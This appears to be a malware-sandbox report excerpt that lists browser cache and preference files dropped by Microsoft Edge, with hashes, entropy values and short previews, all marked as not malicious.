                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):57
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:uriCache_

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.003057018403707
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclVHW/Yn:YWLSGTt1o9LuLgfGBPAzkVj/T8lEQn
                                                                                                                                                                                                                                                                                                                                MD5:5CE8EB8A64ED17D2B951D9E09477364D
                                                                                                                                                                                                                                                                                                                                SHA1:0105D5B92F150EB8F01233EA7C258CF3E33346E0
                                                                                                                                                                                                                                                                                                                                SHA-256:7FB0F8DF418A18313989DAA712A0D9C662F933E3B25CBF25DB294B085DDCFD0E
                                                                                                                                                                                                                                                                                                                                SHA-512:494ECB1543660966043549B62E71B032C189BEAB671C3CF57F631BD4F14F3EAD22DD71DC6FEBE97F95DD9152BF2084A95469AD6CC59D6F3ACEBD4353525F10CA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1730250143780007}]}

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                                                MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                                                SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                                                SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                                                                SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ab6e779d-e8c2-4594-8ee8-f2a35e1b91f9.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                Size (bytes):45863
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.088029507262182
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:mMkbJrT8IeQcrQgeoo92cu9hDO6vP6OwaO3122vdEF0dYcpYL+CAoWGoup1Xl3jU:mMk1rT8H+oo9T6QaOWcp1RoWhu3VlXrm
                                                                                                                                                                                                                                                                                                                                MD5:2E98DA54D517A07C9B7835B5A40FBEEC
                                                                                                                                                                                                                                                                                                                                SHA1:D1F24E370625AE84B7E641E1782784A301092FA1
                                                                                                                                                                                                                                                                                                                                SHA-256:8B44B083F3E8526004F555FB599525C7A6111D0C9AECC980826949C2C4AA4D1E
                                                                                                                                                                                                                                                                                                                                SHA-512:732376682E074F5853672C0E1803DC6DEBA1EF18BB1D281D31BA18CFD7A39704B036992DE252125D9B68C10EAEC1C6F0C37D7DC84FE009CC22258998399BAE1B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c00542f8-84ca-43c1-a8b4-85e0f9439917.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):45739
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.088398123498191
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:mMkbJrT8IeQcrQgx9oOcu9hDO6vP6OwaO3B22vdEF0dYcpYL+CAoWGoup1Xl3jVu:mMk1rT8HR9o76QaOacp1RoWhu3VlXr4F
                                                                                                                                                                                                                                                                                                                                MD5:762DC2B98299C7C79A028B5F55F3BBED
                                                                                                                                                                                                                                                                                                                                SHA1:5BF02368483A753F14B9786B224163E845814773
                                                                                                                                                                                                                                                                                                                                SHA-256:E9510693D662623492214F8018604B0FF3719ECB1B1C39FDE0E559CF657B68AF
                                                                                                                                                                                                                                                                                                                                SHA-512:54A1DBD8DBD25F2DB7F8572DB50C6D1E93E6D80164208FDDD8FA12CB6762854CC10DAFAF05C5C217867FFF0E0407069EEFCFAE7A26BB7CBBF15713807B5B177E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c2bdecf1-2c41-40cd-828a-ffecf53ef1ff.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):44682
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.096085078021746
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBqwuAhDO6vP6OwaO3B22vdEF0dYcGoup1Xl3jVzXq:z/Ps+wsI7yOE+6QaOachu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                MD5:92B37D5BB42A9FE04ED1F8F8148C670F
                                                                                                                                                                                                                                                                                                                                SHA1:45B0FF799FBE5FA05AA734715B28409AFA3D2C49
                                                                                                                                                                                                                                                                                                                                SHA-256:4C9113F71F5D83766F812BC4624A645B888E420E180993C1D8E7FE7022242730
                                                                                                                                                                                                                                                                                                                                SHA-512:3AE6C90C4F20990CF617488ACA83CDA3C033F4433FA5C12CFB32BEF8443A1F49218D43A93E50E98ECB558920754B1E622545544D1438601F5880E7A303874F88
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\cf5e96be-3435-4931-a62b-5dd7ff077cef.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.090756405094512
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMkwuF9hDO6vP6O+ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEC6stbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                MD5:D663CE705C38B77B5378E567292A85D9
                                                                                                                                                                                                                                                                                                                                SHA1:1705CCB0A7D2CAD052763B481CC4711D36A96AF6
                                                                                                                                                                                                                                                                                                                                SHA-256:BBFECD8C8F25F1792CA86588D9550C48B7559219A6E5D6BA5D6EEFE173B078E3
                                                                                                                                                                                                                                                                                                                                SHA-512:A31D7861BC8FF94737D2DED87060921FDF1ABE7F77FF0E03A871B4FDF96AD8F38B96088A133EC886E0C7985C5ED9F6F7B6CD0A9119EF7BE516E382ACAFA04EB5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e1377cc1-2aed-4d32-b7a3-6e584fdb9869.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                Size (bytes):44600
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.096730044969757
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBtwuAhDO6vP6OwaO3JlgyluFDncGoup1Xl3jVzXr2:z/Ps+wsI7ynEn6QaOMchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                MD5:E42114B7A1DC1B26DA4DF41620780334
                                                                                                                                                                                                                                                                                                                                SHA1:461FDDB544F0F1734E296AF1A3273AFFBD5F6892
                                                                                                                                                                                                                                                                                                                                SHA-256:2565A1C4A544902FA0D9829F75BB94168EB921A1D6F675E1A4C83701C5ADC164
                                                                                                                                                                                                                                                                                                                                SHA-512:5BBC1EA006768D05B8009A463B7DF418FB8C5CE9F5B4ECFDE65A81E3E9E466391FF702F75A0FFD5925545D4AE2CAFC0A7221894A4B88D5E8A94FA50F749941D9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e875cd5f-15a2-4bb2-847a-2b7270c74b46.tmp

                                                                                                                                                                                                                                                                                                                                Download File
